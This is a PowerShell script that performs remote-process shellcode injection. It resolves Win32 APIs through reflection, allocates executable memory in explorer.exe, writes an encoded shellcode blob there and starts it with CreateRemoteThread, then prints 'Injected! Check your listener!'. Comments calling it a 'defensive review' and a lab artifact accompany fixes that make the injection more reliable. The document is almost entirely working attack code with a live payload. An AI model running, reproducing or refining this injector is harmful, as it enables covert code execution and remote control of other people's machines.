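<#
.SYNOPSIS
Remote-process shellcode injection via reflective Win32 API resolution (no Add-Type / P/Invoke declarations).

.DESCRIPTION
Resolves kernel32 exports through the already-loaded System.dll internals
(Microsoft.Win32.UnsafeNativeMethods.GetModuleHandle / GetProcAddress), builds
delegate types at runtime with Reflection.Emit, and then performs the classic
OpenProcess -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread sequence
against the first explorer.exe it finds.

Review notes (defensive):
  * The remote allocation is PAGE_EXECUTE_READWRITE (0x40) and execution starts via
    CreateRemoteThread into explorer.exe. RWX cross-process allocations and remote
    thread creation are both widely used detection signals; nothing here is altered
    to change that.
  * Every Win32 return value is now checked, so the "Injected!" banner is only
    printed when all four calls reported success. The original printed it
    unconditionally.
  * The process handle and thread handle are closed when done (they were leaked).
  * The technique relies on a GAC-loaded System.dll, i.e. Windows PowerShell /
    .NET Framework; on .NET Core based PowerShell the lookup presumably finds no
    such assembly and LookupFunc now fails loudly instead of returning nothing.
Lab / training artifact: only run against systems you are authorised to test.
#>

function LookupFunc {
    <#
    .SYNOPSIS
    Returns the address of $functionName exported by $moduleName.

    .PARAMETER moduleName
    Name of an already-loaded module, e.g. kernel32.dll (GetModuleHandle does not load it).

    .PARAMETER functionName
    Export name to resolve.

    .OUTPUTS
    [IntPtr] - function address, or IntPtr.Zero if GetProcAddress failed.
    #>
    Param ($moduleName, $functionName)

    # Locate the framework System.dll in the GAC; it carries the internal
    # UnsafeNativeMethods type that already wraps GetModuleHandle/GetProcAddress.
    $systemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() |
        Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') } |
        Select-Object -First 1
    if (-not $systemAssembly) {
        throw "LookupFunc: no GAC-loaded System.dll found in the current AppDomain"
    }
    $unsafeNative = $systemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
    if (-not $unsafeNative) {
        throw "LookupFunc: Microsoft.Win32.UnsafeNativeMethods not found in System.dll"
    }

    # GetProcAddress has more than one overload; prefer the one taking an IntPtr
    # module handle (what GetModuleHandle returns). Fall back to the first match,
    # which is what the original code used unconditionally.
    $overloads = @($unsafeNative.GetMethods() | Where-Object { $_.Name -eq 'GetProcAddress' })
    if ($overloads.Count -eq 0) {
        throw "LookupFunc: GetProcAddress not found on UnsafeNativeMethods"
    }
    $byIntPtr = @($overloads | Where-Object { $_.GetParameters()[0].ParameterType -eq [IntPtr] })
    $getProcAddress = if ($byIntPtr.Count -gt 0) { $byIntPtr[0] } else { $overloads[0] }

    $hModule = $unsafeNative.GetMethod('GetModuleHandle').Invoke($null, @($moduleName))
    return $getProcAddress.Invoke($null, @($hModule, $functionName))
}

function getDelegateType {
    <#
    .SYNOPSIS
    Emits an in-memory delegate type with the given parameter and return types.

    .PARAMETER func
    Parameter types of the native function, in order.

    .PARAMETER delType
    Return type of the native function (defaults to [Void]).

    .OUTPUTS
    [Type] - a sealed MulticastDelegate subclass usable with GetDelegateForFunctionPointer.
    #>
    Param (
        [Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,
        [Parameter(Position = 1)] [Type] $delType = [Void]
    )

    # A fresh dynamic assembly per call; the names can repeat because each
    # assembly is its own scope.
    $type = [AppDomain]::CurrentDomain.
        DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),
                              [System.Reflection.Emit.AssemblyBuilderAccess]::Run).
        DefineDynamicModule('InMemoryModule', $false).
        DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])

    # Runtime-managed constructor and Invoke: the runtime supplies the bodies,
    # which is what makes the type a valid delegate.
    $type.
        DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $func).
        SetImplementationFlags('Runtime, Managed')
    $type.
        DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).
        SetImplementationFlags('Runtime, Managed')

    return $type.CreateType()
}

function Get-Win32Delegate {
    <#
    .SYNOPSIS
    Resolves $functionName in $moduleName and wraps it in a callable delegate.

    .PARAMETER ParamTypes
    Native parameter types, in order.

    .PARAMETER ReturnType
    Native return type (defaults to [Void]).

    .OUTPUTS
    [System.Delegate] - call .Invoke(...) on it.
    #>
    Param (
        [Parameter(Position = 0, Mandatory = $True)] [string] $moduleName,
        [Parameter(Position = 1, Mandatory = $True)] [string] $functionName,
        [Parameter(Position = 2, Mandatory = $True)] [Type[]] $ParamTypes,
        [Parameter(Position = 3)] [Type] $ReturnType = [Void]
    )

    $address = LookupFunc $moduleName $functionName
    if ($address -eq [IntPtr]::Zero) {
        throw "Get-Win32Delegate: could not resolve $moduleName!$functionName"
    }
    return [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(
        $address, (getDelegateType $ParamTypes $ReturnType))
}

# ---------------------------------------------------------------------------
# Target: the first explorer.exe. Get-Process returns one object per instance
# (e.g. several logged-on sessions); the original took .Id of the whole result,
# which becomes an array and breaks the OpenProcess call.
# ---------------------------------------------------------------------------
$explorer = Get-Process explorer -ErrorAction Stop | Select-Object -First 1
$procId = $explorer.Id

# Opaque, encoded payload blob taken verbatim from the listing; its behaviour
# cannot be read from here. Length drives the remote allocation below.
[Byte[]] $buf = @(
    0xda,0xca,0xbf,0xcd,0xce,0xa3,0x8d,0xd9,0x74,0x24,0xf4,0x58,0x2b,0xc9,0x66,0xb9,0x1e,0x1,0x31,0x78,0x19,0x3,0x78,0x19,0x83,0xd,0xca,0x41,0x78,0x54,0x17,0x3e,0xf0,0xcd,0xab,0xf6,0x2e,0x65,0xe8,0xc,0x88,0xac,0x39,0x8a,0x90,0xb8,0xb8,0x62,0xbb,0xd8,0x39,0x6c,0xc7,0xe3,0x65,0x75,0xda,0x65,0xe5,0x61,0x15,0x9f,0xeb,0xfe,0x39,0x80,0x72,0x70,0x1a,0xba,0x2c,0x8b,0xc4,0x41,0x45,0xa,0xab,0x5d,0x31,0x85,0x46,0x94,0x62,0x5d,0x45,0xaf,0x55,0x12,0x22,0x87,0xf6,0xa2,0x5d,0xfe,0x8c,0x27,0x64,0x6,0x6e,0xd2,0x2,0xf3,0xf5,0xc3,0x65,0xfe,0xe1,0xbc,0x9f,0x37,0x7a,0x97,0xcf,0x4c,0xca,0xf9,0x62,0x38,0xe7,0xfa,0x9f,0x47,0xdf,0x97,0x0,0x37,0x57,0xe7,0x80,0x37,0xbb,0x5b,0x91,0xaf,0x7f,0xc6,0xa5,0x46,0x76,0xb,0x6,0x1e,0x5,0x15,0xbc,0xf9,0x20,0xe6,0x36,0x1a,0xf0,0xb9,0x40,0xf9,0xac,0x2e,0xa3,0xa8,0xe5,0xfc,0xcf,0x32,0xc3,0xdb,0x1,0xa1,0x1a,0x39,0x31,0xc4,0x83,0x41,0xde,0x76,0x8b,0x50,0xfb,0x98,0xed,0xbd,0xdb,0x5b,0x21,0x5a,0xc9,0x53,0xfb,0x9d,0x66,0x53,0xd1,0xe8,0xb6,0x91,0x85,0x35,0x80,0x41,0x9b,0x4c,0x9f,0xbb,0xe2,0x90,0x61,0x2d,0x19,0xc6,0x4d,0xfd,0xa9,0xbc,0x92,0x76,0x60,0x8d,0xc,0x14,0x20,0x92,0xc5,0xe4,0x2c,0x1a,0x27,0x26,0xcd,0xb9,0x57,0xa7,0xd0,0xf8,0xcb,0xff,0xa,0x2b,0xda,0xee,0x2a,0xd3,0xfa,0x43,0x86,0x51,0x82,0xfb,0x9e,0x96,0x9d,0xd9,0x31,0xa,0x36,0x49,0xe4,0x53,0x7f,0x85,0x9a,0xef,0xe1,0x3e,0xf,0xc1,0xf,0xd7,0x8,0x71,0x50,0x87,0x7,0x4e,0xff,0x69,0xc1,0xea,0x64,0x67,0x5c,0x59,0x9a,0x60,0x91,0x59,0xc1,0x97,0x3c,0xc1,0x5f,0x14,0x6b,0x3a,0xcc,0x73,0x2b,0xfd,0x76,0xef,0xc7,0x3b,0xec,0xb9,0x2d,0x15,0xec,0xff,0x16,0x23,0x55,0x41,0x68,0xb2,0xda,0x62,0xaa,0x3a,0x80,0x19,0x2f,0x7f,0x4b,0x87,0x68,0xd6,0x43,0xec,0xf6,0xde,0x5b,0xfa,0x32,0xa5,0xad,0x87,0x43,0xd9,0xfa,0xfa,0x2d,0x90,0x91,0x4e,0x72,0xb0,0xe3,0x9f,0x52,0x16,0x25,0x70,0x66,0x51,0x77,0xe7,0x1e,0x33,0xcf,0x7d,0xbb,0x80,0xdc,0xdd,0x23,0x43,0x77,0x48,0xa1,0x47,0xd3,0xb3,0xff,0xf,0x55,0x51,0x86,0xb,0x5d,0x5f,0xb2,0x74,
    0x19,0xcc,0x68,0xa9,0xc4,0x23,0x4f,0x5b,0x62,0x29,0x1f,0x21,0xf9,0x68,0x2d,0xa2,0x17,0xd2,0xac,0xea,0x8d,0xd3,0xc2,0xb7,0x97,0x40,0xf6,0x43,0xbe,0xf1,0x19,0x16,0x28,0x3,0xcb,0x20,0xa9,0x87,0x11,0xb6,0xf9,0x98,0xf1,0x89,0xf9,0x7d,0xd1,0x39,0x2b,0x7b,0xcc,0x70,0x69,0x2f,0xad,0xfb,0x1,0xb7,0x69,0xa7,0x83,0xe8,0xd6,0x9c,0xc6,0x30,0xd1,0x6d,0xf4,0x3c,0x9f,0x63,0xb6,0x10,0x4f,0x15,0x78,0x38,0x43,0x42,0x75,0xe7,0xad,0x4e,0xc,0x4,0x1e,0x53,0xe5,0x4d,0xb0,0x5c,0x79,0x77,0x4e,0xa9,0x8b,0xc3,0x2e,0xc7,0xb,0xae,0x9b,0xfd,0xb9,0xa6,0xbc,0x3f,0x4a,0x83,0x15,0x68,0x87,0x26,0xee,0xd0,0x56,0xb2,0xc0,0x63,0x94,0x21,0xe5,0xe4,0xfa,0xb1,0xa9,0xa0,0xc6,0x7,0x24,0x3,0x3,0x4a,0x22,0x43,0xcd,0x13,0x4d,0x74,0x9c,0x51,0xb2,0x35,0xe1,0x3a,0x3d,0x70,0x94,0xee,0x25,0x8b,0xc4,0x95,0x19,0x2,0xc8,0xc5,0xce,0xa4,0x32,0x57,0xb3,0xe4,0xb9,0xbb,0xe7,0x9d,0x9d,0x90,0xd,0x2c,0x9,0x5a,0x2f,0xe0,0xa0,0xfb,0xec,0xe6,0x13,0x65,0x68,0xd9,0xf9,0xae,0xba,0x74,0xdb,0xb5,0xe6,0xe8,0x2e,0xb5,0x8f,0x99,0x7d,0x32,0xa9,0x9,0x9b,0x2e,0x64,0xe5,0x22,0x3,0xc3,0xe6,0xa7,0xa3,0xb,0x18,0x3,0x5a,0x6b,0x82,0xb0,0x5c,0x92,0xb,0x9,0x7b,0x40,0x3f,0x45,0xd6,0x74,0xc4,0x23,0x87,0x17,0x17,0x72,0x3,0x95,0x4a,0x8,0xf9,0x5d,0xb,0x43,0x35,0xb3,0xc5,0x71,0x87,0xee,0xab,0x38,0xdb,0x7a,0x64,0x6a,0x7b,0x28,0x15,0x84,0xa6,0x38,0xf7,0x6e,0xd4,0xeb,0x65,0xb8,0x44,0x9c,0x37,0xfe,0xd0,0xb4,0x6d,0xed,0x9d,0x1,0x9c,0x73,0x72,0x68,0x41,0xea,0x4d,0xeb,0x87,0xd4,0x19,0x6f,0x5e,0xca,0xa,0x33,0xbd,0xf7,0x81,0xce,0x1f,0xcd,0x93,0x13,0x88,0x73,0x92,0xfe,0x3c,0x94,0x3d,0x5b,0xa2,0x51,0x19,0x27,0x2e,0x5c,0x5b,0xaf,0xd0,0x24,0xdd,0x56,0x1f,0xb5,0xba,0x9,0x42,0x20,0xae,0x84,0x8f,0xcb,0x0,0x61,0x6,0x72,0x72,0x83,0xf1,0xf,0xac,0x20,0x74,0xd,0x1b,0x6,0x7f,0x79,0x7,0x99,0x54,0xba,0x27,0x2e,0x16,0x25,0xcf,0xdc,0xda,0xd7,0xf5,0xca,0xc9,0x89,0x72,0x7e,0xed,0xe7,0x62,0xe9,0x0,0x33,0xf8,0x8d,0x92,0x42,0x22,0xbf,0x4f,0xc8,0xfc,0x1c,0xfa,0x96,0xb4,0x71,0x25,0x4f,0xaa,0x8,0xb,0xd0,0x27,0xbc,0x50,0xb5,0x9,0xef,0x50,0x96,0x32,0x51,0xee,0x3e,0x30,0x1a,0x4d,0xfc,0xa5,0x75,
    0x87,0x29,0xfa,0xd0,0x5a,0xca,0xf5,0x79,0x70,0x46,0x16,0xff,0xa6,0x5f,0x47,0x16,0x2,0x6d,0x9d,0x80,0x2a,0x9d,0x41,0xc4,0x66,0x95,0xe4,0x4,0xe4,0x4f,0x2f,0x48,0x9b,0x44,0xe0,0x4f,0xda,0xfd,0x88,0x97,0x8d,0xe5,0x80,0x73,0xed,0x8,0x56,0x1,0x2f,0x58,0x76,0xcd,0xbf,0x52,0xb6,0xfc,0x0,0xe5,0x94,0xe5,0x61,0xca,0x9,0xef,0x35,0xd7,0xa9,0x7a,0x41,0xc5,0xed,0x60,0xa,0x72,0xe1,0xdd,0xc,0x71,0x41,0xe,0x52,0x81,0x6d,0x30,0x6a,0xb1,0x12,0xee,0x35,0xd2,0xc4,0x89,0xbd,0x13,0x91,0xb8,0x8a,0x39,0x96,0x70,0xc2,0x1c,0x83,0xb,0xd6,0x9e,0x29,0xbe,0x3b,0xc7,0x7d,0xda,0xe3,0x36,0x12,0xb2,0xd8,0x93,0xc9,0x14,0x1a,0xa4,0xd8,0x67,0x79,0x74,0x6d,0x34,0x52,0x86,0xf3,0x86,0x45,0xd0,0xd1,0xa2,0x88,0x32,0xe1,0x1f,0x82,0x1a,0xc1,0x64,0xe5,0x45,0x22,0x4d,0xcb,0x59,0x60,0xc7,0x6b,0x33,0xc0,0x73,0x1e,0x25,0x75,0x99,0xcf,0x24,0x9,0x5b,0xbf,0x4b,0x71,0x97,0x0,0x49,0x28,0x5d,0x94,0x4e,0x77,0x92,0xe3,0x84,0x8c,0x21,0xc2,0xcc,0x5a,0xa,0x82,0xea,0x52,0x98,0x0,0xcb,0x43,0xd4,0x31,0xdc,0x91,0xb9,0xca,0xe0,0x7c,0xe,0x2b,0x82,0x35,0x82,0xd9,0x7b,0x3a,0x7f,0x43,0x7a,0xa8,0xd1,0xa2,0xc5,0xe,0xde,0x77,0xa7,0x40,0x8b,0x80,0x90,0x50,0xe7,0xfd,0x3c,0xbe,0x49,0x65,0x97,0x8b,0x3c,0x9e,0x80,0x2c,0xf5,0xe8,0x3f,0xbd,0x14,0x0,0x11,0x4c,0x49,0x57,0x98,0x95,0xc4,0x75,0x5b,0xff,0x43,0xd3,0xfe,0x6,0xbf,0xb8,0xf5,0xc,0x2a,0xf8,0x9d,0xaa,0x22,0x30,0x27,0x3,0xd9,0xaf,0x43,0x67,0x7e,0x50,0x24,0x7b,0xf3,0xcd,0x79,0x57,0xe7,0xaf,0xad,0xe8,0xf5,0x60,0xb0,0x36,0xcc,0x12,0xb0,0xa4,0x63,0xb7,0x9c,0xeb,0xed,0xa7,0x61,0xd0,0xfd,0x5b,0x53,0x92,0x28,0x33,0x2,0xd6,0x77,0x1a,0x33,0x4e,0x99,0x94,0xbc,0x75,0x6a,0x8d,0x89,0x84,0x32,0x41,0xb9,0xd4,0x9c,0x52,0x84,0xa,0x16,0xcb,0x22,0xc2,0x14,0x84,0x81,0x4d,0xd4,0x70,0x5e,0x30,0x6b,0x91,0x27,0xff,0x7,0xb3,0x31,0xfb,0xa2,0xf,0xd3,0x76,0xc8,0xfb,0xa7,0xac,0xfd,0xdc,0xf5,0x3c,0x12,0xfa,0x43,0x7d,0xd1,0xb8,0x34,0xf3,0x69,0x47,0x95,0x5d,0xe9,0xa9,0x14,0x1,0x54,0x90,0x95,0x7d,0xa,0x22,0x2a
)
if ($buf.Length -eq 0) {
    throw "Payload buffer is empty; nothing to inject"
}

# Resolve all four kernel32 delegates up front so a resolution failure happens
# before any handle is opened. CreateRemoteThread now declares its real HANDLE
# return type ([IntPtr]); the original discarded it as [Void] and so could not
# tell whether the thread was created.
$openProcess        = Get-Win32Delegate kernel32.dll OpenProcess        -ParamTypes @([UInt32], [UInt32], [UInt32]) -ReturnType ([IntPtr])
$virtualAllocEx     = Get-Win32Delegate kernel32.dll VirtualAllocEx     -ParamTypes @([IntPtr], [IntPtr], [UInt32], [UInt32], [UInt32]) -ReturnType ([IntPtr])
$writeProcessMemory = Get-Win32Delegate kernel32.dll WriteProcessMemory -ParamTypes @([IntPtr], [IntPtr], [Byte[]], [UInt32], [IntPtr]) -ReturnType ([Bool])
$createRemoteThread = Get-Win32Delegate kernel32.dll CreateRemoteThread -ParamTypes @([IntPtr], [IntPtr], [UInt32], [IntPtr], [UInt32], [IntPtr]) -ReturnType ([IntPtr])
$closeHandle        = Get-Win32Delegate kernel32.dll CloseHandle        -ParamTypes @([IntPtr]) -ReturnType ([Bool])

# 0x001F0FFF = PROCESS_ALL_ACCESS, kept from the original. It is far more than
# the four calls below need (VM_OPERATION | VM_WRITE | CREATE_THREAD |
# QUERY_INFORMATION would do) - a least-privilege reviewer would narrow it.
$hProcess = $openProcess.Invoke(0x001F0FFF, 0, $procId)
if ($hProcess -eq [IntPtr]::Zero) {
    # NOTE(review): delegates produced by GetDelegateForFunctionPointer presumably do
    # not capture the Win32 last-error, so no error code is reported here.
    throw "OpenProcess failed for PID $procId (insufficient privileges or protected process?)"
}

$hThread = [IntPtr]::Zero
try {
    # 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
    # The remote allocation is intentionally never freed: the thread below runs from it.
    $expAddr = $virtualAllocEx.Invoke($hProcess, [IntPtr]::Zero, [UInt32]$buf.Length, 0x3000, 0x40)
    if ($expAddr -eq [IntPtr]::Zero) {
        throw "VirtualAllocEx failed in PID $procId"
    }

    $procMemResult = $writeProcessMemory.Invoke($hProcess, $expAddr, $buf, [UInt32]$buf.Length, [IntPtr]::Zero)
    if (-not $procMemResult) {
        throw "WriteProcessMemory failed in PID $procId"
    }

    $hThread = $createRemoteThread.Invoke($hProcess, [IntPtr]::Zero, 0, $expAddr, 0, [IntPtr]::Zero)
    if ($hThread -eq [IntPtr]::Zero) {
        throw "CreateRemoteThread failed in PID $procId"
    }

    Write-Host "Injected! Check your listener!"
}
finally {
    # Closing our handles does not affect the remote thread; it only stops this
    # process from leaking them (the original never closed either).
    if ($hThread -ne [IntPtr]::Zero) { $null = $closeHandle.Invoke($hThread) }
    $null = $closeHandle.Invoke($hProcess)
}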